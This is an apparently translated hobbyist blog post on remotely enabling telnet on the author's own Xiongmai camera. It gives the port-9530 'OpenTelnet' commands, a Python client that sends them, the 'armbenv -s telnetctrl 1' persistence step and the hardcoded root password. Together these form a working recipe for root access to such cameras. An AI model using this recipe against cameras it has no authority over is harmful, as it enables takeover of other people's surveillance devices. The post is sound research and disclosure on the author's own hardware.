Research on remotely enabling telnet on a Xiongmai camera

Source: Internet
Author: User

A few years ago I bought a Xiongmai camera for home security monitoring. The camera is really an embedded device running Linux. After getting it I was unhappy that the telnet service is not enabled by default, so I intended to hack it open. The simplest method is to connect a TTL serial console and enable it from there; the second is to download the firmware, add a line that starts telnetd to the startup script, and flash it back. But the camera was newly bought and I did not want to lose the warranty, and I also wanted to use the opportunity to study and learn, so I only considered ways of enabling telnet remotely without touching the firmware.

First I downloaded the latest firmware from the official website and unpacked it locally. Looking at the BusyBox applet list, telnetd is indeed there, and a telnetd symlink exists under /bin, so the system does support the telnet service; it just is not turned on. I searched the firmware files for any telnet-related configuration and found nothing, so that road was not feasible.

From official customer service, after some persuasion, I obtained the official telnet-enabling tool, opentelnet. After entering the target device's IP, it remotely turns on the device's telnet service. But the tool has a few limitations:

1. It only enables telnet temporarily; after the camera restarts it has to be enabled again.
2. The tool has to be given a one-time "super password", which customer service can calculate for you.
3. The tool checks the entered IP address and only accepts devices on the internal network.

The super password check was fairly simple and I cracked it after a little study; the intranet check was also easy to bypass with a local port mapping. Only the temporary nature of the opening had no workaround, and having to re-enable telnet after every restart is annoying, so I started studying a permanent way to enable telnet. There are two possible routes:

1. As with the temporary command, the system itself supports a command that enables telnet permanently.
2. The system does not support such a command, but telnetd can be added to a startup script so that the telnet service starts automatically at boot.

First I captured the tool's traffic and found that it communicates with the camera on port 9530, sending the command OpenTelnet:OpenOnce. I then telnetted into the camera and ran netstat -ap to see who is using port 9530:
    # netstat -ap
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 0.0.0.0:34567           0.0.0.0:*               LISTEN      1190/sofia
    tcp        0      0 0.0.0.0:554             0.0.0.0:*               LISTEN      1190/sofia
    tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      1190/sofia
    tcp        0      0 0.0.0.0:telnet          0.0.0.0:*               LISTEN      1169/telnetd
    tcp        0      0 0.0.0.0:23000           0.0.0.0:*               LISTEN      1190/sofia
    tcp        0      0 0.0.0.0:9530            0.0.0.0:*               LISTEN      1165/dvrhelper

dvrhelper

What the hell is this?

Because the camera's BusyBox is missing many commands, finding and analysing things on the device itself is troublesome, so I went back to analysing the firmware locally.

Searching the firmware folder for dvrhelper, I found that it is a link to dvrbox, and searching the strings inside dvrbox:

Besides OpenTelnet:OpenOnce, I found OpenTelnet:Forever.

As the name implies, is this the command that enables telnet permanently?

I modified the earlier opentelnet tool to send OpenTelnet:Forever instead of OpenTelnet:OpenOnce.
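The exchange described above, as an added example that is not the author's opentelnet tool or any Xiongmai code: it sends one of the two control strings to dvrhelper on port 9530 and then checks whether port 23 starts accepting connections, and it includes a small parser for the BusyBox netstat -ap listing quoted earlier so the 9530 listener can be picked out of a capture automatically. The post shows only the command string, not any further handshake the device may perform, so the client just reports whatever the device replies. The target address 192.168.1.10 is an assumed LAN address, and the netstat text embedded below is the listing from the post, re-typed as a constructed sample.

```python
"""Added example: probe the port-9530 control service described in the post."""
import socket

# The two control strings the post found (the second one inside dvrbox).
COMMAND_ONCE = b"OpenTelnet:OpenOnce"
COMMAND_FOREVER = b"OpenTelnet:Forever"
CONTROL_PORT = 9530
TELNET_PORT = 23

# Constructed sample: the netstat -ap listing quoted in the post.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:34567           0.0.0.0:*               LISTEN      1190/sofia
tcp        0      0 0.0.0.0:554             0.0.0.0:*               LISTEN      1190/sofia
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      1190/sofia
tcp        0      0 0.0.0.0:telnet          0.0.0.0:*               LISTEN      1169/telnetd
tcp        0      0 0.0.0.0:23000           0.0.0.0:*               LISTEN      1190/sofia
tcp        0      0 0.0.0.0:9530            0.0.0.0:*               LISTEN      1165/dvrhelper
"""

# BusyBox netstat prints well-known ports by service name; map the names seen here.
SERVICE_PORTS = {"www": 80, "telnet": 23}


def parse_listeners(netstat_output):
    """Return {port: (pid, program)} for every TCP socket in LISTEN state."""
    listeners = {}
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0] != "tcp" or fields[5] != "LISTEN":
            continue  # header lines and non-listening sockets
        name = fields[3].rsplit(":", 1)[1]
        port = SERVICE_PORTS.get(name, int(name) if name.isdigit() else None)
        if port is None:
            continue  # unknown service name: skip rather than guess
        pid, program = fields[6].split("/", 1)
        listeners[port] = (int(pid), program)
    return listeners


def program_on_port(netstat_output, port):
    """Process name listening on `port`, or None (9530 -> 'dvrhelper' in the sample)."""
    entry = parse_listeners(netstat_output).get(port)
    return entry[1] if entry else None


def port_open(host, port, timeout=3.0):
    """True if a TCP connect to host:port succeeds (used to see whether telnetd came up)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_control(host, command=COMMAND_ONCE, timeout=3.0):
    """Send one control string to port 9530 and return the raw reply (possibly empty)."""
    with socket.create_connection((host, CONTROL_PORT), timeout=timeout) as sock:
        sock.sendall(command)
        try:
            return sock.recv(1024)
        except OSError:  # timeout or reset: the post does not show what the device answers
            return b""


def open_telnet(host, command=COMMAND_ONCE):
    """Run the exchange from the post and report whether port 23 became reachable."""
    before = port_open(host, TELNET_PORT)
    reply = send_control(host, command)
    after = port_open(host, TELNET_PORT)
    return {"telnet_before": before, "reply": reply, "telnet_after": after}


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.10"  # assumed LAN address
    cmd = COMMAND_FOREVER if "--forever" in sys.argv else COMMAND_ONCE
    print(program_on_port(SAMPLE_NETSTAT, CONTROL_PORT))  # dvrhelper
    print(open_telnet(target, cmd))
```

Running it with --forever repeats the author's second experiment; rebooting the camera and calling port_open again afterwards is the check that distinguishes a temporary from a permanent opening.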

After executing it and restarting the camera, the telnet service still was not started. Damn, it seems I guessed wrong, or the system simply does not support enabling telnet permanently this way. That road was a dead end.

So I started looking for writable directories on the system, and found only the following three: /mnt/mtd, /utils and /var/tmp.

- /utils is an in-memory filesystem that is emptied after a reboot, so not this one.
- /var/tmp is also a temporary folder that is wiped on restart, so not this one either.
- /mnt/mtd, then? Originally I had tried to modify the rcS file under /etc/init.d to start telnetd at boot, but that file is read-only and I never found a way to modify it or the scripts it runs. I spent half a day on /mnt/mtd with no clue: the files there can be changed, but nothing can be added to the startup items. It might, however, be used as a configuration file: if startup detects that the file exists it runs telnetd, otherwise not.

The answer to that could only be found in the firmware, so back to studying the dvrbox file:
    # strings dvrbox | grep telnet
    telnetctrl
    libdvr:get telnetctrl fialed, telnetctrl=1
    killall telnetd
    macguarder:close telnetd forever

Is telnetctrl the name of the configuration parameter?

A global search for telnetctrl in the firmware folder found this parameter mentioned again only in armbenv. What is armbenv? Running the armbenv command prints a usage message saying that the -r parameter prints the environment information. Continuing with armbenv -r, based on the results and my own guesses, I think armbenv is used to set the system's boot environment variables. It also has a -s parameter that sets a param, so why not try? Run the following command:

    # armbenv -s telnetctrl 1

It reports success. Running armbenv -r again shows that telnetctrl now exists. Reboot, and telnet connects directly. Success!

Notes:

1. armbenv should be a tool for reading and writing the U-Boot environment, which is why no corresponding configuration record can be found in the file system.
2. The telnet account password is actually very simple. After unpacking the firmware, look at the etc/passwd file inside romfs-x.cramfs; it contains the encrypted password string. Searching for that string in a search engine turned up the corresponding password. For this Xiongmai camera the account and password are root / XMHDIPC.

